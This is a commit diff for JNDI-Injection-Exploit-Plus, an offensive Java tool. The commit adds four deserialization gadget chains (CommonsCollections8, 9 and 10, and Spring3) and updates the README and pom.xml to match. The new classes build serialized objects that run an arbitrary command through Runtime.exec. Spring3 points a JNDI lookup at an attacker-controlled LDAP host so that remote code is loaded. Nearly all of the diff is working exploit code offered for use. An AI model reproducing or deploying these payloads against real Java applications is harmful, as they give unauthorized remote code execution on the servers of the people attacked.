add 4 more gadgets

Author: cckuailong

README.md

@@ -31,7 +31,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 33)
+#### 3. Deserailization Gadget (total: 37)
 
 P.S. More Gadgets than ysoserial, welcome to PR more! ^_^
 
@@ -51,6 +51,9 @@ CommonsCollections4 |@frohoff                    |commons-collections4:4.0
 CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
 CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
 CommonsCollections7 |@scristalli, @hanyrax, @EdoardoVignati |commons-collections:3.1
+CommonsCollections8 |@cckuailong                 |commons-collections4:4.0
+CommonsCollections9 |@cckuailong                 |commons-collections:3.1
+CommonsCollections10|@cckuailong                 |commons-collections:3.2.1
 FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
 Groovy1             |@frohoff                    |groovy:2.3.9
 Hibernate1          |@mbechler|
@@ -67,7 +70,8 @@ ROME1               |@mbechler                   |rome:1.0
 ROME2               |@firebasky                  |rome:1.0
 Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
 Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
-URLDNS              |@gebl|						 |jre only vuln detect
+Spring3             |@cckuailong                 |spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2
+URLDNS              |@gebl						 |jre only vuln detect
 Vaadin1             |@kai_ullrich                |vaadin-server:7.7.14, vaadin-shared:7.7.14
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 WildFly1            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
@@ -77,7 +81,7 @@ WildFly1            |@hugow                      |org.wildfly:wildfly-connector:
  Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -109,7 +113,7 @@ Points for attention:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:

pom.xml

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.0-SNAPSHOT</version>
+    <version>1.1-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -213,6 +213,22 @@
             <version>26.0.1.Final</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-tx</artifactId>
+            <version>4.2.4.RELEASE</version>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-context</artifactId>
+            <version>4.2.4.RELEASE</version>
+        </dependency>
+        <dependency>
+            <groupId>javax.transaction</groupId>
+            <artifactId>javax.transaction-api</artifactId>
+            <version>1.2</version>
+        </dependency>
+
         <!-- test -->
         <dependency>
             <groupId>junit</groupId>

src/main/java/jndi/CommonDeserial.java

@@ -45,6 +45,15 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
             case "CommonsCollections7":
                 bytes = CommonsCollections7.getBytes(command);
                 break;
+            case "CommonsCollections8":
+                bytes = CommonsCollections8.getBytes(command);
+                break;
+            case "CommonsCollections9":
+                bytes = CommonsCollections9.getBytes(command);
+                break;
+            case "CommonsCollections10":
+                bytes = CommonsCollections10.getBytes(command);
+                break;
             case "AspectJWeaver":
                 bytes = AspectJWeaver.getBytes(command);
                 break;
@@ -108,6 +117,9 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
             case "Spring2":
                 bytes = Spring2.getBytes(command);
                 break;
+            case "Spring3":
+                bytes = Spring3.getBytes(codebase);
+                break;
             case "URLDNS":
                 bytes = URLDNS.getBytes(command);
                 break;

src/main/java/payloads/CommonsCollections10.java

@@ -0,0 +1,96 @@
+package payloads;
+
+import org.apache.commons.collections.comparators.TransformingComparator;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.Gadgets;
+import util.PayloadRunner;
+import util.Reflections;
+
+import javax.management.BadAttributeValueExpException;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+
+/*
+java.security.manager off OR set jdk.xml.enableTemplatesImplDeserialization=true
+Gadget chain:
+    java.io.ObjectInputStream.readObject()
+        java.util.HashSet.readObject()
+            java.util.HashMap.put()
+            java.util.HashMap.hash()
+                org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
+                org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
+                    org.apache.commons.collections.map.LazyMap.get()
+                        org.apache.commons.collections.functors.InvokerTransformer.transform()
+                        java.lang.reflect.Method.invoke()
+                            ... templates gadgets ...
+                                java.lang.Runtime.exec()
+*/
+@Dependencies({"commons-collections:commons-collections:3.2.1"})
+@Authors({Authors.CCKUAILONG})
+
+public class CommonsCollections10 extends PayloadRunner implements ObjectPayload<HashSet> {
+
+    public HashSet getObject(final String command) throws Exception {
+        final Object templates = Gadgets.createTemplatesImpl(command);
+        // mock method name until armed
+        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+        final Map innerMap = new HashMap();
+
+        final Map lazyMap = LazyMap.decorate(innerMap, transformer);
+
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, templates);
+
+        HashSet map = new HashSet(1);
+        map.add("foo");
+        Field f = null;
+        try {
+            f = HashSet.class.getDeclaredField("map");
+        } catch (NoSuchFieldException e) {
+            f = HashSet.class.getDeclaredField("backingMap");
+        }
+        Reflections.setAccessible(f);
+        HashMap innimpl = null;
+        innimpl = (HashMap) f.get(map);
+
+        Field f2 = null;
+        try {
+            f2 = HashMap.class.getDeclaredField("table");
+        } catch (NoSuchFieldException e) {
+            f2 = HashMap.class.getDeclaredField("elementData");
+        }
+        Reflections.setAccessible(f2);
+        Object[] array = new Object[0];
+        array = (Object[]) f2.get(innimpl);
+        Object node = array[0];
+        if(node == null){
+            node = array[1];
+        }
+
+        Field keyField = null;
+        try{
+            keyField = node.getClass().getDeclaredField("key");
+        }catch(Exception e){
+            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
+        }
+        Reflections.setAccessible(keyField);
+        keyField.set(node, entry);
+        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+        return map;
+    }
+
+    public static byte[] getBytes(final String command) throws Exception {
+        return PayloadRunner.run(CommonsCollections10.class, command);
+    }
+
+    public static void main(final String command) throws Exception {
+        PayloadRunner.run(CommonsCollections10.class, command);
+    }
+}

src/main/java/payloads/CommonsCollections8.java

@@ -0,0 +1,59 @@
+package payloads;
+
+import org.apache.commons.collections4.bag.TreeBag;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.Gadgets;
+import util.PayloadRunner;
+import util.Reflections;
+
+/*
+Gadget chain:
+    org.apache.commons.collections4.bag.TreeBag.readObject
+    org.apache.commons.collections4.bag.AbstractMapBag.doReadObject
+    java.util.TreeMap.put
+    java.util.TreeMap.compare
+    org.apache.commons.collections4.comparators.TransformingComparator.compare
+    org.apache.commons.collections4.functors.InvokerTransformer.transform
+    java.lang.reflect.Method.invoke
+    sun.reflect.DelegatingMethodAccessorImpl.invoke
+    sun.reflect.NativeMethodAccessorImpl.invoke
+    sun.reflect.NativeMethodAccessorImpl.invoke0
+    com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer
+        ... (TemplatesImpl gadget)
+    java.lang.Runtime.exec
+*/
+@Dependencies({"org.apache.commons:commons-collections4:4.0"})
+@Authors({Authors.CCKUAILONG})
+
+public class CommonsCollections8 extends PayloadRunner implements ObjectPayload<TreeBag> {
+
+    public TreeBag getObject(final String command) throws Exception {
+        Object templates = Gadgets.createTemplatesImpl(command);
+
+        // setup harmless chain
+        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+        // define the comparator used for sorting
+        TransformingComparator comp = new TransformingComparator(transformer);
+
+        // prepare CommonsCollections object entry point
+        TreeBag tree = new TreeBag(comp);
+        tree.add(templates);
+
+        // arm transformer
+        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+        return tree;
+    }
+
+    public static byte[] getBytes(final String command) throws Exception {
+        return PayloadRunner.run(CommonsCollections8.class, command);
+    }
+
+    public static void main(final String command) throws Exception {
+        PayloadRunner.run(CommonsCollections8.class, command);
+    }
+}

src/main/java/payloads/CommonsCollections9.java

@@ -0,0 +1,85 @@
+package payloads;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+import util.Reflections;
+
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Hashtable;
+import java.util.Map;
+
+/*
+Gadget chain:
+java.util.Hashtable.readObject
+    java.util.Hashtable.reconstitutionPut
+    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
+        org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
+            org.apache.commons.collections.map.LazyMap.get()
+                org.apache.commons.collections.functors.ChainedTransformer.transform()
+                org.apache.commons.collections.functors.InvokerTransformer.transform()
+                java.lang.reflect.Method.invoke()
+                    java.lang.Runtime.exec()
+*/
+@Dependencies({"commons-collections:commons-collections:3.1"})
+@Authors({Authors.CCKUAILONG})
+
+public class CommonsCollections9 extends PayloadRunner implements ObjectPayload<Hashtable> {
+
+    public Hashtable getObject(String command) throws Exception {
+        final String[] execArgs = new String[]{command};
+
+        final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
+
+        final Transformer[] transformers = new Transformer[]{
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod",
+                        new Class[]{String.class, Class[].class},
+                        new Object[]{"getRuntime", new Class[0]}),
+                new InvokerTransformer("invoke",
+                        new Class[]{Object.class, Object[].class},
+                        new Object[]{null, new Object[0]}),
+                new InvokerTransformer("exec",
+                        new Class[]{String.class},
+                        execArgs),
+                new ConstantTransformer(1)};
+
+        final Map innerMap = new HashMap();
+
+        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+        Hashtable hashtable = new Hashtable();
+        hashtable.put("foo",1);
+        // 获取hashtable的table类属性
+        Field tableField = Hashtable.class.getDeclaredField("table");
+        Reflections.setAccessible(tableField);
+        Object[] table = (Object[])tableField.get(hashtable);
+        Object entry1 = table[0];
+        if(entry1==null)
+            entry1 = table[1];
+        // 获取Hashtable.Entry的key属性
+        Field keyField = entry1.getClass().getDeclaredField("key");
+        Reflections.setAccessible(keyField);
+        // 将key属性给替换成构造好的TiedMapEntry实例
+        keyField.set(entry1, entry);
+        // 填充真正的命令执行代码
+        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);
+        return hashtable;
+    }
+
+    public static byte[] getBytes(final String command) throws Exception {
+        return PayloadRunner.run(CommonsCollections9.class, command);
+    }
+
+    public static void main(final String command) throws Exception {
+        PayloadRunner.run(CommonsCollections9.class, command);
+    }
+}

src/main/java/payloads/Spring3.java

@@ -0,0 +1,35 @@
+package payloads;
+
+
+import org.springframework.transaction.jta.JtaTransactionManager;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import java.net.URL;
+
+
+/**
+ *
+ * Spring-tx JtxTransactionManager JNDI Injection
+ *
+ */
+
+@Dependencies ( {"org.springframework:spring-tx:5.2.3.RELEASE","org.springframework:spring-context:5.2.3.RELEASE","javax.transaction:javax.transaction-api:1.2"} )
+@Authors({ Authors.CCKUAILONG })
+public class Spring3 extends PayloadRunner implements ObjectPayload<Object> {
+
+    public Object getObject ( final String command ) throws Exception {
+        JtaTransactionManager manager = new JtaTransactionManager();
+        manager.setUserTransactionName(command);
+        return manager;
+    }
+
+    public static byte[] getBytes ( final URL codebase ) throws Exception {
+        return PayloadRunner.run(Spring3.class, "ldap://" + codebase.getHost() + ":1389/remoteExploit8");
+    }
+
+    public static void main ( final String command ) throws Exception {
+        PayloadRunner.run(Spring3.class, command);
+    }
+}